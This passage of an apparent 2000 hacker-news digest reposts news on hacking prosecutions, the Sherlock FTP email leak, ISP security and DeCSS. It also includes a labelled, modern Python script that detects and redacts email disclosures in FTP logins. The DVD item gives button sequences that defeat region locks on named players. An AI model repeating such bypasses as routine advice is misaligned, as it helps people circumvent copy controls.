      charges related to alleged assaults on his mother and was
      ordered held at a juvenile detention center in Ocala for up to
      15 days while officials determine what to do with him. 
   
      Keith Schenck, staff attorney for the Circuit Court judges in
      Citrus County, said it is rare that someone has been charged
      with such an offense in this county. 
   
      "This may be the first one," he said. 
   
      However, the law under which Johnson is charged actually
      was created in 1978, he said. 
   
      The teen was found out after another student witnessed
      Johnson using a library computer to tap into school records
      and told a teacher. The teacher saw Johnson walk away in a
      hurry from the computer and checked it out, said Jeffery
      Smith, the assistant state attorney who handles juvenile
      offenders. 
   
      A school resource officer investigated the incident. He
      learned from school staff that Johnson had bragged about
      breaking into the school computer. Staff members also told
      him students were talking about paying Johnson to change
      their grades. 
   
      From the library computer, Johnson gained access to the
      computer server for authorized personnel. From there, he
      was able to look at teachers' files that include past and
      current grades, according to the school resource officer's
      report. 
   
      The officer, Deputy Ron Frink, said a school district
      technology specialist told him Johnson was in an area that
      took two security password clearances to penetrate. 
   
      Smith said the boy confessed. He also said it doesn't appear
      that Johnson actually changed any grades. 
   
      "I have no indication that there was anything other than him
      bragging happening," Smith said. 
   
      The computer hacking charge is a third-degree felony, and
      Johnson would have faced as many as five years in prison if
      convicted as an adult. Had he actually changed his grades,
      the charge would have been upgraded to a second-degree
      felony, which carries a prison term of up to 15 years. 
   
      Because he is charged as a juvenile, he faces a more limited
      penalty, which could include counseling. 

      
      
      @HWA 
      
72.0  HNN:Feb 21st:Japan To Increase Cyber Defense
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by William Knowles 
      
      Ken Sato, administrative vice minister of The Defense Agency, said that
      they are planning to establish a unit in the Self-Defense Forces
      dedicated to combating cyber intrusions against key computer systems,
      as part of the five-year defense buildup program beginning in fiscal
      2001.
      
      The Daily Yomiuri
      http://www.yomiuri.co.jp/newse/0218cr06.htm
      (404)
      
      @HWA 
      
       
73.0  HNN:Feb 21st:Possible Privacy Violation in Apple's Sherlock
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by Arik 
      
      Apple's Sherlock, an Internet search technology, sends out users'
      e-mail addresses. This occurs when Sherlock, going into auto-update
      mode, searches for new versions of modules that enable it to search
      specific sites. When the update is sent via FTP Sherlock logs in,
      sending the users' e-mail address as the login password. (This is a
      known issue with FTP, that is why they invented SCP.)
      
      The Register UK
      http://www.theregister.co.uk/000218-000017.html
      
      
     Posted 18/02/2000 1:40pm by Tony Smith
   
     MacOS' Sherlock surreptitiously sends email
     addresses
   
     A security glitch that exposes users' email addresses has been found lurking within
     Apple's Sherlock Internet search technology. 
   
     The discovery comes a month after it was detected that Apple's iTools online service
     transmits users' passwords without scrambling them first. 
   
     The latest discovery was made by MacWelt magazine and Web site MacSherlock. In
     fact, it's not a glitch as such, rather it's a lack of thought on the part of Sherlock's
     programmers. 
   
     Sherlock has an auto-update facility which checks for new versions of modules that
     allow it to search specific sites. The Register itself has just such a plug-in that can be
     downloaded here. Our plug-in is provided through a Web server, but if the update is
     transferred by FTP, Sherlock will log in anonymously, but provide the user's email
     address as the login password. 
   
     In the past, it was considered courteous to provide your email address this way when
     downloading files anonymously. Nowadays, in these more privacy-conscious times,
     it's much less commonplace. In fact, many applications that support FTP, such as
     Netscape Navigator, allow users the choice as to whether their email address is
     transmitted this way. 
   
     Last month's security glitch centred on the iTools browser plug-in, which
     communicates with the server using XML. Software developer Brad Pettit discovered
     that the plug-in transmits the user's password as plain text. 
   
     "One could theoretically control the plug-in from any link that loads content into your
     Web browser. And you wouldn't even know it," he said. 
   
     Pettit also found the iTools software capable of "gathering and sending all sorts of
     machine-specific data to Apple, such as hardware ethernet addresses".
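
      The anonymous-FTP behaviour described above can be audited in captured
      control-channel traffic. The following is an added example, not code
      from HNN, The Register or Apple; the capture format (connection id,
      C or S for direction, then the FTP line), the sample session and every
      address in it are constructed for illustration.

```python
import re
from collections import namedtuple

# Constructed sample of FTP control-channel lines: "<conn> <C|S> <ftp line>".
# C = sent by the client, S = sent by the server.
SAMPLE_CAPTURE = """\
c1 C USER anonymous
c1 S 331 Guest login ok, send your complete e-mail address as password.
c1 C PASS jane.doe@corp.example.net
c1 S 230 Guest login ok, access restrictions apply.
c2 C user ftp
c2 C pass guest@
c3 C USER alice
c3 C PASS hunter2@home.example.org
c4 C PASS stray@nowhere.example.com
c5 C USER anonymous
c5 C PASS -bob@isp.example.com
"""

# Account names that conventionally mean "anonymous login".
ANON_USERS = {"anonymous", "ftp"}

# A full address: non-empty local part and a dotted domain.
# Placeholders such as "guest@" deliberately do not match.
EMAIL_RE = re.compile(r"^[^@\s]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

Finding = namedtuple("Finding", "conn disclosed domain")


def redact(addr):
    """Keep the first character and the domain so the report itself
    does not become a second copy of the leaked address."""
    local, _, domain = addr.partition("@")
    return local[0] + "***@" + domain


def find_disclosures(capture):
    """Return one Finding per anonymous login whose PASS argument is a
    real-looking e-mail address.

    Passwords of named (non-anonymous) accounts are credentials, so they
    are never inspected or reported. A PASS with no preceding USER on the
    same connection is ignored.
    """
    pending = {}   # conn id -> most recent USER argument, lower-cased
    findings = []
    for raw in capture.splitlines():
        parts = raw.split(None, 3)
        if len(parts) < 3 or parts[1] != "C":
            continue                      # server replies and junk lines
        conn, verb = parts[0], parts[2].upper()   # FTP verbs are case-insensitive
        arg = parts[3].strip() if len(parts) > 3 else ""
        if verb == "USER":
            pending[conn] = arg.lower()
        elif verb == "PASS":
            user = pending.pop(conn, None)
            if user not in ANON_USERS:
                continue
            # Some servers of the era read a leading "-" in the password as
            # "suppress banner messages"; the address follows the dash.
            candidate = arg[1:] if arg.startswith("-") else arg
            if EMAIL_RE.match(candidate):
                domain = candidate.split("@", 1)[1].lower()
                findings.append(Finding(conn, redact(candidate), domain))
    return findings


if __name__ == "__main__":
    for f in find_disclosures(SAMPLE_CAPTURE):
        print(f"{f.conn}: anonymous login disclosed {f.disclosed}")
```

      Connections c2 (placeholder password), c3 (named account) and c4 (PASS
      without USER) produce no finding; only c1 and c5 are reported.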
   
      @HWA
      
74.0  HNN:Feb 22nd:Sympatico Quiet on Search for mafiaboy 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


      contributed by twilyght 
      Bell Canada's Sympatico Internet service, Canada's
      largest Internet service provider, refused to comment
      on weekend reports that police had searched the
      company's files for information about a user known as
      'mafiaboy', who has been linked to data attacks this
      month on e-commerce sites. After an accusation by
      Recourse Technologies Inc. that mafiaboy was based in
      Canada, RCMP officials have searched the offices of
      other service providers in the area. 

      The Toronto Star 
      http://www.thestar.com/thestar/editorial/money/20000222BUS07b_FI-HACK.html
      (404)
      
      @HWA
      
75.0  HNN:Feb 22nd: ISPs Look at Customer Security as Low Priority 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      After the recent media-hyped denial of service attacks
      against such major online sites as Yahoo, CNN, ZD Net
      and others, home users are becoming more and more
      concerned about their own security and are looking to
      their ISPs for help. ISPs say that they are doing the
      best that they can to respond to customer requests. 

      ZD Net      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2444159,00.html?chkpt=zdhpnews01
      
      Web attacks: Are ISPs doing enough?

      Not according to many broadband customers
      and security experts.



      By Robert Lemos, ZDNet News
      UPDATED February 21, 2000 2:28 PM PT 



      Security experts and Internet users are becoming
      increasingly vocal about their concerns that
      high-speed Internet providers are not doing enough
      to ensure the data security of home users. 

      "It's been two months (since I notified my provider of three
      potential attacks)," wrote a Santa Clara, Calif.-based
      Web production manager to ZDNet News Talkback. "And
      I still haven't heard from (them). I'm not overly concerned
      about prosecuting hackers ... but I do care about my own
      privacy and the security of my system." 


      In the wake of the recent denial-of-service attacks against
      eight major Web sites, including ZDNet (NYSE: ZDZ),
      personal security has become less of an add-on and
      more of a must-have feature for Internet surfers. (See:
      Has your PC been hijacked?) 

      Customer security low priority

      Unfortunately, while high-speed Internet providers are
      intent on making their networks secure, they frequently
      overlook the security of their customers, said Jeremy
      Rauch, manager of vulnerability content and co-founder of
      security information site Security-Focus.com. 

      "Broadband ISPs don't seem to be doing a lot on the problem
      right now," he said. "They don't seem to be going out of their
      way to educate customers about the problem." 

      A recent example: Two months ago, said Rauch, Usenet
      newsgroups were ready to give the @Home Internet service the
      "death penalty" -- blocking any user from the @Home domain
      from posting to newsgroups. The reason? Spammers were
      sending e-mail out to the Internet using @Home customers'
      computers to camouflage the source. If the ISP had helped its
      users correctly configure their computers, the problem never
      would have happened, said Rauch. 

      Yet, providers insist that they are taking customers'
      security seriously. 

      'Eyes and ears open'

      @Home has learned from its checkered past, said
      Jacqueline Russo, spokeswoman for Excite@Home
      (Nasdaq: ATHM), and now has become more vigilant,
      adding a security page to its services sponsored by
      security software maker McAfee. "We are constantly
      keeping our eyes and ears open," she said. 

      Another problem for providers: Personal firewall programs
      have become quite popular with users. Many of those
      programs warn users of every little ping and port request,
      resulting in paranoid users who always think their PCs
      are under attack. 

      "These programs have taken off in the past six to eight
      weeks as more people are going out and looking for
      security," said Curtis Benton, network operations
      manager for Internet-over-DSL provider Flashcom
      Communications Inc. "Yet, people get too concerned over
      security sometimes, and they become convinced that
      anything attempting to contact their computer is coming
      from a malicious personality." 

      The result is a flood of e-mail to providers that is as
      debilitating as the denial-of-service attacks that hit the
      Web Feb. 7-9. 

      'A stack of complaints'

      "We have an abuse coordinator that has a stack of
      complaints that he has to determine whether are a
      serious threat or not," explained a system administrator
      for Road Runner, Time Warner Inc.'s high-speed Internet
      service, who asked to remain anonymous. "It would be
      hard to respond to every single complaint, especially
      when people are sending us their BlackICE logs and the
      like every day, and we have thousands of users." 

      In the week following the attacks on major Web sites,
      personal firewall maker Network ICE Inc. has seen
      requests for its product, called BlackICE, skyrocket by
      30 percent to 50 percent. Rival Zone Labs, maker of a
      free firewall called ZoneAlarm, has seen 400,000
      downloads of its program in the past week. 

      Greg Gilliom, CEO of Network ICE, admits that personal
      firewalls can generate a lot of alarms. "The problem (for
      providers) is that they don't have time to deal with every
      knock on a customer's door by script kiddies," he said.
      The next version of BlackICE will not explicitly tell users
      when it has blocked an attempt to access their PC,
      though it will log the incident. 

      Gilliom also stressed that broadband providers are getting
      better about integrating their customers' security with
      their own. "We are in discussion with several ISPs that
      are thinking about rolling out a security service," he said.
      "They can charge the end user $3 to $5. Later, as
      everyone starts doing security, it will just become part of
      the service." 

      Security: Let the user decide?

      That will let Internet providers tailor security to the needs
      of the user, said Shawn Dainas, spokesman for Pacific
      Bell Internet Services. 

      "Consumers have to decide if they need more security
      themselves," he said. "Just like in the real world, different
      people have different security needs -- some may want to have
      a state-of-the-art security system, others may just need a dog." 

      In the meantime, users should not wait for the broadband
      providers to come to them, stressed David Davidson, a
      software engineer from Omaha, Neb., in a post to ZDNet
      News Talkback. 

      "(Don't) take your security for granted," he wrote. "Learn
      and protect yourself." 
      
      @HWA
      
76.0  HNN:Feb 22nd:Circumventing DVD Zoning 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 


      contributed by no0ne 
      The movie industry has divided the world into different
      DVD zones. A DVD made for a certain zone is not going
      to play or be recognized by DVD players in other zones,
      at least that was how it was supposed to be. People
      have found different ways of circumventing the zoning,
      detailing ways of how to make DVD players from certain
      regions read DVD's meant for other regions. 

      The Register UK       
      http://www.theregister.co.uk/000222-000008.html
      
      Posted 22/02/2000 2:15pm by Tony Smith
    
      How to hack Tesco's DVD player -- Register readers
      write
    
      Register readers are clearly a resourceful lot -- we've had stacks of email revealing
      just how Wharfedale's DVD player can be hacked to support DVDs from any of the
      regions into which the movie industry has divided the world (see Tesco slams
      'unnecessary' DVD zoning). 
    
      Well, Wharfedale admitted its player was "easily hackable", and it sure is. The trick is
      simple: open the player's tray, put a Region One disc on the tray, press the 0, 1, 2 and
      3 buttons on the remote control, and finally press Play on the remote. That closes the
      tray and from this point on the player will accept DVDs from any of the six main
      regions. 
    
      Thanks to reader Patrick for pointing out that the hack also works with the Proline
      DVD1000, the Bush DVD-2000, the Grundig GDV-200 and the Grundig GDV-210
      DVD players. 
    
      And Tony D notes that you can also "press pause on an Aiwa stereo remote whilst
      pointing at unit. You will see a maintenance screen. Set the region, and off you go. This
      works on my Wharfedale". 
    
      Readers Chris Dennis and Tom note that to convert the player back to Region Two
      only, the procedure is: open the tray, place a Region Two disc on the tray, press the
      Return button on the remote and finally press the remote's Play button. 
    
      Of course, there's probably little point in returning the player to its original state since,
      as reader Rob notes, "my DVD quite happily plays Region One and Region Two
      without difficulty". 
    
      Owners of Matsui DVD-110 player and the Schneider DVD-810 sold by Asda, there's
      a hack for them too, according to a number of readers. Simply press Menu, 9,
      Open/Close (note that the tray won't open at this point) and then 5 to call up a region
      selection screen. 
    
      And thanks to Andy Crawford for pointing out Web site DVD Reviewer, which lists
      pretty much all the machines currently available with simple multi-region hacks and
      reveals just how effective the hacks are -- not always, it seems, particularly with older
      players. 
    
      Kate Wolf dropped us a line to say that hi-fi specialist Richer Sounds offers an Ariston
      player that can also be easily hacked. And, according to Keith Kennedy and others,
      "90 per cent of all the DVD players sold in [Switzerland] are sold as region free". That
      said, this appears to be simply because stores send all their kit out for conversion
      before selling them on to the public. As Nick Barnes found: "Chatting to a staff
      member in Media Markt... he confirmed that stores buy X units from manufacturer Y
      and send them all to company Z that modifies them". 
    
      Rob White had problems with the Wharfedale DVD-750 he bought from Tesco and
      took it back (he didn't say whether he tried a replacement machine). Instead, he uses
      his PC and PowerDVD software which "easily defeats the zoning information, by the
      way, just by storing the zone in the registry". 
    
      DVD software region changing is tackled by DVD Informatrix (thanks to Phil
      Chambers for the link). 
    
      Matt Rix, meanwhile, provides a little anti-spin (in the great Register tradition). "Tesco
      had been selling the Wharfedale player for several months before Christmas, but due
      to very high demand it went out of stock," he notes. "So really, they're re-launching the
      old product line." So much for Tesco's 'sales trial' line. 
      
      @HWA
      
77.0  HNN:Feb 22nd:Voters Kill Filter Proposal 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by janoVd 
      While a majority of voters in Michigan cast ballots in
      favor of presidential hopeful John McCain, voters in the
      small town of Holland were also voting on whether to
      allow the public library to install filters on its computers.
      Residents of the small town voted 4,379 to 3,626
      against the proposal, which would have cut off funding
      to the library unless the filters were installed.
      Proponents of the measure have said that the defeat
      won't end their fight to get filters installed on the library
      computers. (The people have spoken, listen to them!) 

      Associated Press - via Boston Globe
      http://www.boston.com/dailynews/054/economy/Voters_defeat_measure_on_filte:.shtml
      
      (404)
      
      @HWA
      
78.0  HNN:Feb 22nd: Former CIA Director Regrets Security Breach 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Former CIA Director John Deutch appeared before the
      Senate Intelligence Committee to answer questions
      regarding his use of computers at his home for classified
      material. There is no evidence that indicates his system
      was compromised during the time it was used May 1995 to
      December 1996. (Companies should learn from this
      when employees take their laptops home.) 

      Reuters - via Yahoo              
      http://dailynews.yahoo.com/h/nm/20000222/ts/cia_deutch_5.html
      
      Tuesday February 22 7:49 PM ET 
      Former CIA Chief Contrite Over Risky Computer Use

      WASHINGTON (Reuters) - Former CIA Director John Deutch, who was found 
      to have ``intentionally'' used nonsecure home computers to process 
      secret reports, showed contrition when he went before a closed Senate 
      hearing on Tuesday.

      Deutch was questioned by the Senate Intelligence Committee, which 
      released a CIA report of its probe into Deutch's use of computers at 
      his home for classified material while he served as CIA director from 
      May 1995 to December 1996.

      The 77-page report, an unclassified version of an 86-page classified 
      CIA report given to congressional intelligence committees last August, 
      said Deutch ``continuously processed classified information on 
      government-owned desktop computers configured for unclassified use 
      during his tenure.''

      Examples of material found on Deutch's computers included memos to the 
      U.S. president and vice president containing top-secret information, 
      including information on official trips, the report of the CIA Inspector 
      General said.

      ``I acknowledged, and I apologized for, the mistakes I made in using 
      unclassified government computers for some of my classified work,'' Deutch 
      said after the hearing.

      ``At no time did I intend to violate security rules, and, fortunately, 
      there is no evidence of compromise,'' he said. ``The director of central 
      intelligence is not above the rules, and, indeed, the director of central 
      intelligence should be an example of respect for security. I very 
      much regret my errors,'' he said.

      Deutch's Successor Criticized

      The report was critical of the investigation of Deutch and said his 
      successor, George Tenet, should have ``involved himself more forcefully to 
      ensure a proper resolution of this matter.''

      The CIA's director of public affairs, Bill Harlow, issued a statement 
      noting that Tenet had accepted the initial investigation was not conducted 
      well but stressing that the Inspector General had concluded that no one 
      had ``intentionally impeded'' it.

      ``We could have and should have done better,'' Harlow said.

      Deutch was stripped of his CIA and high-level Pentagon intelligence 
      clearances last August for mishandling classified information. Recently he 
      gave up his last remaining Pentagon clearances, which allowed him to work 
      on classified defense contracts.

      The report referred to a prior incident of the mishandling of classified 
      information that involved Deutch before he became CIA director. In the 
      early 1980s, while Deutch was on an advisory panel, he took a lie-detector 
      test that apparently showed he had not been as careful in handling 
      classified material as he should have been, but the issue was resolved.

      ``It's Unusual Behavior''

      Richard Shelby, the Alabama Republican, who chairs the Senate Intelligence 
      Committee, said of Deutch's actions: ``It's unusual behavior, especially 
      where Dr. Deutch had been warned before regarding his misuse of classified 
      information. We know he's a bright man, he's served the government a 
      long time, but he wasn't serving it very well when this went on.''

      The report said there was no evidence that any top-secret material had 
      been compromised despite the facts that a number of people had access to 
      the computers and the computers had Internet connections.

      But it concluded that Deutch had been told he was not authorized to 
      process classified information on nonsecure computers, which he had at his 
      Maryland and Massachusetts homes and his offices in the Old Executive 
      Office Building and CIA headquarters. He also used a CIA-issued 
      unclassified laptop computer for classified information, the report said.

      ``Throughout his tenure as (CIA head), Deutch intentionally processed on 
      those computers large volumes of highly classified information (including) 
      Top Secret Codeword material,'' it said.

      ``All were connected to or contained modems that allowed external 
      connectivity to computer networks such as the Internet. Such computers are 
      vulnerable to attacks by unauthorized persons,'' the report said.

      Classified Information Retrieved

      ``CIA personnel retrieved (classified) information from Deutch's 
      unclassified computers and magnetic media related to covert action, Top 
      Secret communications intelligence and the National Reconnaissance Program 
      budget,'' the report said.

      Deutch had said other people who used the government computer in the study 
      of his Maryland home included his wife, who used it to prepare reports 
      relating to official travel with him, the Inspector General's report said.

      Another family member used that computer to access a university library. A 
      maid who worked at the Deutches' Maryland home and was a resident alien in 
      the United States was allowed ``independent access to the residence'' 
      while the family was away and had the alarm-deactivation code for 
      the home.

      ``CIA security database records do not reflect any security clearances 
      being issued to the alien,'' who obtained U.S. citizenship in 1998, the 
      report said.

      Deutch used an online identity that was a variation of his name, and he 
      was listed by his real name in the Internet service provider's publicly 
      available online membership directory, the report said.

      ``Deutch's online identities used during his tenure (as director of 
      central intelligence) may have increased the risk of electronic attack,'' 
      it said.

      The CIA and Pentagon are conducting separate reviews of the material found 
      on Deutch's home computer to assess what might have been compromised if an 
      outsider had accessed it.

      Shelby faulted the CIA for not conducting such an assessment sooner and 
      Tenet for having been too slow to inform the panel.

      ``All this happened on (Tenet's) watch,'' Shelby said of the Deutch 
      investigation. ``This I do not believe was Mr. Tenet's finest hour.'' 

     @HWA
      
79.0  HNN:Feb 22nd:New Version of DeCSS Available 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Odin 
      We reported on this last week but the mainstream is
      finally catching up. A small utility called "DeCSS" that
      strips Cascading Style Sheet tags from an HTML
      document has been released. It is hoped that people will
      download, post and link to this version in an effort to
      confuse and confound the MPAA lawyers. 

      Salon
      http://www.salon.com/tech/log/2000/02/22/decss/index.html
      
      DeCSS 
      http://pigdog.org/decss
      
      @HWA
      
80.0  HNN:Feb 22nd:  Windows-NT vs. CP/M 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Dan 
      This may be old but it is too funny not to post.
      Microsoft has come out with a number of benchmarks
      and comparison papers championing the fact that
      Windows-NT is much better than every other operating
      system. But is it better than CP/M? Yes, CP/M. One of
      the first personal computer operating systems. (And the
      one I first used on an Osborne One) 

      Windows-NT vs. CP/M 
      http://www.oualline.com/col/cpm.html
      
      Windows-NT vs. CP/M

      Microsoft has come out with a number of benchmarks and comparison papers 
      championing the fact that Windows-NT is much better than Linux. I find 
      such comparisons fascinating, but rather than rehash this argument, I've 
      decided to create my own comparison. Not of Windows-NT vs. Linux, that's 
      been done. But of Windows-NT vs. CP/M. 

      CP/M for those of you who don't remember was one of the first portable 
      operating systems. It ran on 8 bit 8080 class hardware, and was a single 
      user, floppy based system. (Later versions actually could access a hard 
      drive.) 

      Two systems were selected for this comparison. The CP/M system is a 
      Kaypro-II running a 2MHZ Z80, with 64K of memory and dual 360K 5-1/4 
      floppies. The Windows-NT system runs quad 500 MHZ Pentium Processors, with 
      2GB of memory and 1TB of disk space. This particular configuration 
      was chosen because Microsoft seems to like to use a system like this for 
      all its benchmark comparisons. 

      Performance

      Performance is one key issue in any comparison. I do a lot of writing, so 
      word processing performance is extremely important to me. The CP/M system 
      with Word* and after a 15 second boot Word* let me write documents as fast 
      as I could type. In my two minute test, I could enter about 210 
      words. 

      The Windows-NT system running Microsoft Word also could accept input as 
      fast as I could type, but it took a whole minute to boot up. Thus I could 
      enter only 120 words in my test. So we can conclude that CP/M is 75% 
      faster than Windows-NT for word processing. 

      Let's talk about spreadsheet performance. CP/M with Calc* will balance my 
      checkbook just as fast as I can input the data. Counting the boot time, 
      that means that I can enter about 17 transactions in a two minute test. 
      With Windows-NT with Excel, I get only 10 transactions a second. So 
      as far as spreadsheet performance goes, CP/M is 70% faster than 
      Windows-NT. 

      Conclusion: CP/M provides superior overall performance for common office 
      applications. 

      Security

      CP/M is an extremely secure system. It relies on the physical security 
      methodology. You store the operating systems, programs, and private data 
      on 5-1/4" floppies. You want to use them, put them in the machine. No one 
      can get to your data from the outside through a network because CP/M 
      has no network. You want to secure your data, take the floppies out and 
      lock them up. Want to share data, hand the floppies to another person. 
      Note: This security method allows the user a wide variety of personal 
      authentication schemes such as drivers license, passport, or personal 
      friend known to you. 

      What's even better since we are running on a two floppy system, we can put 
      our software on one floppy and the data on the other. The software floppy 
      can be write protected, and nothing we do can change any of those files. 

      Windows-NT relies on file system security and passwords. There have been 
      lots of studies about the weaknesses of passwords. Any system that relies 
      on passwords is insecure. In addition Windows-NT contains a tremendous 
      security hole called the Administrator account. Anyone logged in to 
      this account can easily read and write all your files. 

      Add to that that Windows-NT connects to a network and allows remote access 
      and you have big security problems. There have been hundreds of reported 
      security problems reported for Windows-NT such as viruses, E-Mail viruses, 
      break ins, denial of service attacks, and many others. None of these 
      problems have affected CP/M. 

      Plus Microsoft relies on operating system file protection to keep you from 
      modifying system files. This means that you must know what files to 
      protect and rely on software to provide your protection. Hardware 
      protection is much easier to configure and provides much more 
      reliable protection. Windows-NT makes no use of hardware protection for 
      system files. 

      Microsoft likes to trumpet the fact that Windows-NT is certified by the 
      government for C3 security. What they leave out is that that was only for 
      a certain version of Windows-NT (which they no longer support) and a 
      certain hardware configuration (which had no network card.) In the 
      real world, a typical Windows-NT installation would never come close to 
      getting C3 certification. 

      CP/M however could easily be certified. It has a very secure network 
      because it has no network capability. It also has a set of keys that you can 
      press that return you to the "secure command server". (It's called the 
      reset button.) These are the big features of C3 security and CP/M 
      has them. The reason that it does not have C3 certification is that no one 
      wants to pay the big bucks to get it certified. 

      Conclusion: The security of CP/M is vastly superior to Windows-NT. 

      Stability

      As far as I know the CP/M system for my Kaypro has not needed an upgrade 
      or patch for the past ten years. Also the operating system has no reported 
      bugs that can crash it. It is small, simple and very stable. 

      During that time Microsoft has had two major releases of Windows-NT, at least 5 
      service packs and is planning on replacing the system with a new version 
      next year. In addition to this there are a large number of bugs out there 
      that Microsoft has yet to fix. Many companies reboot their 
      Windows-NT systems weekly to avoid system crashes that come when you leave 
      Windows-NT running for too long. 

      Conclusion: CP/M is much more stable than Windows-NT. 

      Cost of ownership

      You can probably pick up a Kaypro-II with CP/M, Word* and Calc* at a 
      garage sale for about $10. Or you can go to an auction site and pick one 
      up for about $100-$200. 

      On the other hand a Windows-NT system in the configuration that Microsoft 
      likes to use for benchmarking will probably cost you about $100,000. This 
      includes the price of the hardware, software, and the cost of hiring a 
      team of Microsoft Engineers for three months to tune your system for 
      optimal performance. 

      Conclusion: The cost of ownership of CP/M is much, much lower than 
      Windows-NT. 

      Customer Testimonials

      But let's talk about real world experience. CP/M has hundreds of customer 
      testimonials all describing how useful and easy to use this operating 
      system is, while Microsoft Windows-NT is only able to provide anecdotal 
      evidence. 

      Note: We are using the definitions of these terms as defined by Microsoft 
      Marketing. 

            Customer Testimonials   Stories about how well the operating
                                    system works for the operating system
                                    you like.

            Anecdotal Evidence      Stories about how well the operating
                                    system works for the operating system
                                    you don't like.

      
      Conclusion: Since CP/M has Customer Testimonials and Windows-NT has only 
      Anecdotal Evidence, we must conclude that CP/M is vastly better. 

      Conclusion

      These results show that in every comparison category CP/M is at least 
      as good as Windows-NT and frequently outperforms the Microsoft operating 
      system. 

      Another conclusion we can draw from this is that if you come up with the 
      answer, a good writer can come up with a question that produces the 
      desired result. Comparisons like this one should always be scrutinized for 
      relevance and bias before you put any faith into them. 

      Coming soon, we will compare a Windows-NT system vs. a brick. I'm not going
      to give away the ending, but I'm going to bet that the brick will win. 
      
      @HWA 
      
      
81.0  HNN:Feb 24th:DigiAlmty Busted By Feds
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by McIntyre 
      
      DigiAlmty (Ikenna Iffih), a 28-year-old Northeastern University student,
      has been charged with electronically breaking into the computer systems
      of NASA and the Pentagon. In April of 1999 DigiAlmty was charged with
      illegally gaining access to the systems of the Defense Logistics Agency
      and several commercial systems. Since then the case has been expanded
      and now includes intrusions of Northeastern, NASA and the Pentagon.
      DigiAlmty has also been accused of illegally copying some files and
      destroying others. If found guilty, DigiAlmty could face up to ten years
      in prison and $250,000 in fines. U.S. Attorney Donald Stern said "All in
      all, the defendant used his home computer to leave a trail of cybercrime
      from coast to coast." (If this guy "left a trail from coast to coast"
      what took them so bloody long to drop the hammer?)
      
      DigiAlmty (Ikenna Iffih) was a member of the Northeastern Chapter of
      the Association for Computing Machinery. 
      
      
      
      Mirror of ACM Member Page
      http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/groups/acm/members.html
      
      Mirror of DigiAlmty's Home Page at Northeastern
      http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/home/ikiffih/
      
      
      Mirrors of DigiAlmty Defacements
      http://www.attrition.org/mirror/attrition/digia.html
      
      
      Agence France-Press - via Nando Times 
      http://www2.nando.net:80/noframes/story/0,2107,500172150-500222086-50105851-0,00.html
      
      
      Associated Press - via Boston Globe
      http://www.boston.com/dailynews/054/region/Hacker_faces_charges_in_NASA_a:.shtml
      
      
      Reuters - via Wired
      http://www.wired.com/news/technology/0,1282,34539,00.html
      
      
      
      Student Charged in Govt. Hack 
      Reuters 
      
      4:10 p.m. 23.Feb.2000 PST BOSTON -- A Northeastern University student was 
      charged Wednesday with hacking into federal government computers, 
      including systems at NASA and the Defense Department, in a coast-to-coast 
      attack on public and private Web sites and servers, authorities said. 

      If convicted Ikenna Iffih, 28, faces up to 10 years in prison and a 
      $250,000 fine. 

      U.S. Attorney Donald Stern said Iffih seized control of a NASA Web server 
      in Maryland last year and was able to read, delete, and alter files, as 
      well as intercept and save login names. 

      The compromised server did not contain any classified or sensitive 
      information, and was not involved with the command or control of 
      satellites, Stern said. 

      Using the NASA computer as a platform, Iffih allegedly attacked the 
      Interior Department's Web server, defacing the agency's Web page, 
      prosecutors said. 

      Prosecutors also said Iffih accessed a Defense Department computer, as 
      well as the Web site of an ISP in Washington state, where he "recklessly 
      caused damage" and caused a significant loss of business, prosecutors 
      said. 

      "All in all, the defendant used his home computer to leave a trail of 
      cybercrime from coast to coast," Stern said. 

      A spokeswoman in Stern's office said that there was no known motive for 
      Iffih's alleged hacking. 

      "A lot of these hackers seem to do it just to strut their cyber-prowess," 
      spokeswoman Samantha Martin said. 

      Prosecutors said Iffih was not connected with the high-profile wave of 
      hacking attacks on popular retail, news, and all-purpose Web sites earlier 
      this month. 
      
      @HWA
      
      
      
82.0  HNN:Feb 24th:ISPs Form Alliance To Prevent Attacks
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by no0ne 
      
      A group of ISPs have joined forces with ICSA.net, an internet security
      firm, in an effort to prevent denial of service attacks like those that
      downed major web sites. They have created the Alliance for Internet
      Security to make sure that each other's systems and facilities are not
      used as agents to launch attacks against the other providers. Each
      member company must pledge to secure its own internal systems, add
      filtering technology to prevent spoofing, and provide support for
      others to do the same. Founding members include Cable One, Cable &
      Wireless, Digex, Global Crossing and its U.S. subsidiary Global Center,
      GTE Internetworking, Level(3), Road Runner, and Sprint.
      
      ZDNet
      http://www.zdnet.com/zdnn/stories/news/0,4586,2445261,00.html


      Web attacks? The ISPs strike back!

      Internet service providers band together to
      form a security alliance in hopes of avoiding
      another DoS debacle.

      By Robert Lemos, ZDNet News
      UPDATED February 24, 2000 9:53 AM PT 


      The battle for an attack-proof Web rages on.

      Eight Internet providers have teamed with Internet security
